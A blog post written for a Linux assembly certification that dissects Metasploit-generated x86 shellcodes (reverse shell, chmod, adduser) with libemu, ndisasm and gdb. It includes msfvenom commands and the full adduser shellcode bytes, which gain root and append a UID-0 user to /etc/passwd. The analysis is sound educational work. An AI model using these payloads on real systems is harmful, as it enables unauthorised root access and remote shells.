In this post I will discuss how a shellcode logic and architecture can be understood. For that I will use libemu, ndisasm, and gdb. libemu is an x86 shellcode emulation framework that allows one to faster understand the shellcode logic. ndisasm is a disassembler that comes as a part of nasm package on Kali. And gdb is the venerable GNU Debugger, arguably the best debugger for Linux if you are into CLI.

To generate payloads I will use Metasploit Framework (MSF). And, instead of the used in the past and recently phased out msfpayload tool, I will use its better replacement - msfvenom.

Installation of libemu

When I was installing libemu, I expected to find it in Kali repositories, but alas it wasn't there. After googling a bit, I found that most of the links led to libemu.carnivore.it page, which was down at the time of this writing. So I had to find and fork its source code elsewhere on the GitHub. After getting my hands on its source code I followed this guide on libemu installation and successfully installed it on my system:

# The only dependency I had to satisfy on my Kali machine
apt-get install libtool
cd ~/Downloads

# Cloning the source code from my GitHub repo
git clone --depth=1 https://github.com/reider-roque/libemu
cd libemu

# Building and installing libemu
autoreconf -i -v
./configure --prefix=/opt/libemu
make install

Example #1: Reverse shell

With the following command we will first see what Linux x86 payloads are available:

msfvenom --list payloads | grep linux/x86

Output (truncated):

linux/x86/adduser       Create a new user with UID 0
linux/x86/chmod         Runs chmod on specified file with specified mode
linux/x86/exec          Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp   
Inject the meterpreter server payload (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid            
Inject the meterpreter server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp
Inject the meterpreter server payload (staged). Listen for a connection
linux/x86/meterpreter/bind_tcp
Inject the meterpreter server payload (staged). Listen for a connection (Linux x86)
...

As you can see, most of the available payloads are for spawning either reverse or bind shells. By the way, here is the reason the shellcode is called so: shellcode is a sequence of assembly instructions that is most often used in exploits to spawn an (administrative) shell.

For the first example I will take and dissect the reverse shell payload. Let's first see if there are mandatory options for this payload (output is truncated for brevity):

msfvenom -p linux/x86/shell_reverse_tcp --payload-options

Output:

Options for payload/linux/x86/shell_reverse_tcp:
...
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
...

From the output above we can see that there are two required options, with one of them not having any default value. So for proper work of the payload we can leave LPORT at its default value, but we'll need to supply the LHOST.

Below I will pipe the generated payload into the sctest, binary that comes with libemu framework, which will analyze the code and try to generate a high level structure of the shellcode:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.1.1.1 -f raw | /opt/libemu/bin/sctest -vvv -S -s 100000 -G tmp.dot

The -vvv option to sctest increases verbosity. The -S is for reading input from stdin. The -s option controls the maximum number of instructions to execute and defaults to 1, which means sctest will emulate execution of only the first instruction of the supplied shellcode. To be on the safe side and make sure that every shellcode instruction is executed, it is usually set to some big number, like 100000.

Top of the sctest output

At the top of the output you can see how sctest tears down the shellcode instruction by instruction and shows you the state of registers after execution of each instruction. At the bottom of the output you will find the reconstructed high level view of what's going on:

int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 16843135 (host=127.1.1.1);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

At first glance I thought that sctest reconstructed the whole program in C, but then quickly realized that it is just a C-like syntax. Nevertheless the job sctest did in this department is amazing.

From the output above you can tell that at first the shellcode creates a socket with the socket() function. Then it forwards the process standard input, output and error to that socket with several calls to dup2() function. After that, it initiates a connection to 127.1.1.1 address on port 4444 using connect() function, just as we wanted it to. And finally it spawns the /bin/sh shell using execve().

As you can see using sctest we were able to understand what the shellcode does without even disassembling it. But this is not always the case. Let's take a look at the next example.

Example #2: Chmod

As in the previous example, I will pipe the generated shellcode into sctest. This time it will be the chmod payload. All it does is modify Unix permissions on a file to, by default, 0666.

msfvenom -p linux/x86/chmod FILE=tmp.bin -f raw | /opt/libemu/bin/sctest -vvv -S -s 100000 -G tmp.dot

The -G option supplied to the sctest command outputs a graph of shellcode logic in the dot file format, that can be further converted into an image using dot utility. Looking at the depicted algorithm sometimes facilitates a better understanding of what's happening, especially when the shellcode extensively uses loops and branching.

After running the above command the high level output I got was this:

ERROR  chmod (
) =  -1;
ERROR  exit (
     int status = 4288522;
) =  -1;

Looking at it I could tell that the shellcode probably called the chmod() and exit() functions, but what parameters were passed to chmod() was not clear. Let's take a look at the graph converted from dot to png file format:

dot -Tpng -o tmp.png tmp.dot && eog tmp.png

Chmod shellcode call graph

On the call graph we can again see that sctest definitely caught calls to the chmod() and exit() functions. We can also see that the second argument (ECX register) to the chmod system call is set to 0x1b6, which, as we can confirm on Linux command line with

printf "%o\n" 0x1b6

command translates into 666 in the octal numeral system, which is the default permissions used by the shellcode.

Next, because of the call-pop instruction sequence, we may suppose that the first argument to the chmod() is probably set using the call-pop technique which is a modification of the venerable jmp-call-pop technique with data coming before the destination of call jump. The fact that the graph shows relative address of 0x1 as a call destination is odd and we'll have to use ndisasm and gdb to understand why it is so. But I reserved this activity to a similar problem in the last example that follows.

Also note that the above shellcode contains null bytes. That is because msfvenom does not care about bad characters if you don't tell it to. And although I do not encrypt payloads in my examples here, note that sctest can equally work its way through encrypted shellcodes.

Example #3: Adduser

In this example I want to zero in on the case where the sctest is mostly useless and some interaction with gdb is needed to fully see the shellcode through.

After running the following command, you will see that sctest was not able to generate a high view of the shellcode logic and even the tmp.dot call graph is empty:

msfvenom -p linux/x86/adduser -f raw | /opt/libemu/bin/sctest -vvv -S -s 100000 -G tmp.dot

Let's try a different approach and disassemble the shellcode with ndisasm:

msfvenom -p linux/x86/adduser -f raw > tmp.bin && ndisasm -b32 tmp.bin

Below is the output of the above command with my comments. I truncated the "gibberish" part to save some space.

00000000  31C9              xor ecx,ecx # zero out ECX and EBX
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46 # load EAX with 0x46, corresponding
00000006  58                pop eax     # to setreuid syscall #
00000007  CD80              int 0x80
00000009  6A05              push byte +0x5  # load EAX with open syscall #
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx 
0000000E  51                push ecx        # push some nulls to the stack
0000000F  6873737764        push dword 0x64777373       # pushing /etc//passwd
00000014  682F2F7061        push dword 0x61702f2f       # string to the stack
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx     # ECX is now = 1
00000021  B504              mov ch,0x4      # ECX is now = 1025, or 2001 in octal
00000023  CD80              int 0x80
00000025  93                xchg eax,ebx
00000026  E828000000        call dword 0x53
0000002B  6D                insd            # gibberish begins
0000002C  657461            gs jz 0x90
......................................
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld         # gibberish ends
00000057  6A04              push byte +0x4  # load EAX with write syscall #
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1  # load EAX with exit syscall #
0000005E  58                pop eax
0000005F  CD80              int 0x80

Looking at the above disassembly and my comments, you can tell that the shellcode:

Sets real and effective UID to 0 (gets root privileges)
Opens /etc/passwd file
Writes something into it, and
Exits

Knowing that the shellcode adds a user named metasploit with the same password, it is not difficult to guess what exactly is written to the /etc/passwd. Knowing what exactly the shellcode does, I actually ran it and, sure enough, found metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh string inserted as the last thing in the file.

To decipher the syscall codes I used the /usr/include/i386-linux-gnu/asm/unistd_32.h file where Linux x86 system calls are defined.

The 2001 octal number pushed to ECX represents file access mode flags. To understand what it means I looked into the /usr/include/asm-generic/fcntl.h file, where open() function flags are defined. 2001 represented a combination of O_WRONLY (01) and O_APPEND (02000) flags, which makes perfect sense for the action the shellcode takes.

Now, the interesting part. Note that the call instruction jumps to the 0x53 address. But then there are no separate instructions at that address. There is an instruction at the address 0x52 and then at 0x55. This fact indicates that in the "gibberish" part of the code some incorrect sequence of bytes confused the disassembler and the bytes-to-opcodes translation went off.

Note the sequence of bytes at the 0x52 address - 0A598B. The 53rd byte, where the call instruction jumps is 59. I will regenerate payload in the C format, take the part starting from 53rd byte, and disassemble it to get the correct bytes-to-opcodes translation. For that I will use the scdisas script, which I created while going through the SLAE course materials.

Producing shellcode in the format ready to be pasted into a C program:

msfvenom -p linux/x86/adduser -f c

Output (truncated):

...
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x28\x00\x00\x00\x6d\x65"
"\x74\x61\x73\x70\x6c\x6f\x69\x74\x3a\x41\x7a\x2f\x64\x49\x73"
"\x6a\x34\x70\x34\x49\x52\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a"
"\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58"
"\xcd\x80\x6a\x01\x58\xcd\x80";

Disassembling of the shellcode starting from 52nd byte:

scdisas "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80"

Output:

00000000  59                pop ecx
00000001  8B51FC            mov edx,[ecx-0x4]
00000004  6A04              push byte +0x4
00000006  58                pop eax
00000007  CD80              int 0x80
00000009  6A01              push byte +0x1
0000000B  58                pop eax
0000000C  CD80              int 0x80

In the above output you can see that the instruction where call passes execution flow is a pop instruction. That means that the shellcode employed the variation of jmp-call-pop technique, as encountered in the previous example. So, what I called "gibberish" is actually some kind of data, most likely a string, address to which gets loaded into ECX register. By now we already know what string it is, but just to make sure, let's take a look at it in gdb.

To run the shellcode in gdb I'll save it in the ELF format. The ELF format that msfvenom outputs runs without any problems, but the binary is stripped of all symbols, which means that we won't be able to set a breakpoint on the _start or main labels. To find the entry point we can use the readelf utility. One of the lines from its output will point us to the address in question:

msfvenom -p linux/x86/adduser -f elf > tmp.elf
chmod +x tmp.elf
readelf --headers tmp.elf

Output:

...
  Entry point address:               0x8048054
...

Below is the command sequence that gets us started with gdb:

gdb tmp.elf
(gdb) break *0x8048054
(gdb) run
(gdb) disas $eip,+45

Disassembly view in gdb

On the above picture you can see that the data starts at the address following the call instruction which is 0x0804807f. And running either of the following two commands, we can be certain that the 40 bytes of the data represent the string that as we saw earlier written to the /etc/passwd file:

(gdb) x/40cb 0x0804807f
(gdb) x/s 0x0804807f

Checking string data in gdb

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.

Oleg's Web Log

Dissecting msfvenom shellcodes (SLAE, Assignment #5)

Installation of libemu

Example #1: Reverse shell

Example #2: Chmod

Example #3: Adduser